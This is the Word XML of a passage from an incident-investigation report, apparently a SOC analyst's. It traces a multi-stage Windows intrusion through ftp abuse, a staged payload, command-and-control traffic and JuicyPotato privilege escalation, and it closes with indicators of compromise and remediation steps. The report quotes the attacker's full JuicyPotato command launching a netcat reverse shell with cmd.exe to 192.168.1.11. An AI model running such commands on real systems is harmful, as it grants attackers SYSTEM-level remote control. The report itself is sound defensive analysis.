          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment Manipulation and Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker used ftp(LOLBIN) to modify the environment variable COMSPEC, pointing it to supply.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The FTP was then used to execute supply.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload Installation and Host Recon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The execution of supply.exe resulted in the creation of multiple dependency DLL files including python27 components. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The payload executed multiple reconnaissance commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command-and-Control Activity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple outbound connections to the attacker IP on port 8080 was observed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Additional obfuscated PowerShell Executions occurred.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload Delivery Stage 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply.exe utilizes PowersShell to download JuicyPotato.exe, indicating staged delivery.</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation Attempt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JuicyPotato.exe executed a malicious command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"juicy.exe -l 9999 -p nc.exe -a \"192.168.1.11 9898 -e cmd.exe\" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}\"\n". </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Created a fake COM service on port 9999</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used a legitimate CLSID token to trick high privilege services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Captured a high-privilege system token</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then use the captured token to launch a high-privilege reverse shell via Netcat(nc).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Indicators of Compromise (IOCs)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>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IOC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Updater.HTA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Initial infection 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Supply.exe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Stage 2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JuicyPotato.exe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Privilege Escalation Exploit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IP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192.168.1.11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Command and Control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1234, 6969, 8080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Reverse shell / C2 Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendations and Remediation Actions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">olate the compromised host from the network to prevent further command-and-control communications and lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Terminate all malicious processes, including mshta.exe, suspicious powershell instances, supply.exe and juicypotato.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Block the identified Attacker IP addresses and associated ports at the firewall and endpoint security controls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalate incident to tier 2 SOC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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92">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Investigation determined that the incident involved a multi-staged attack leveraging native windows utilities, staged payload delivery, command and control communication, and privilege escalation techniques. The Investigation confirms that the attacker achieved SYSTEM-level access, significantly increasing the risk of lateral movement, data exfiltration, and full environment compromise.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>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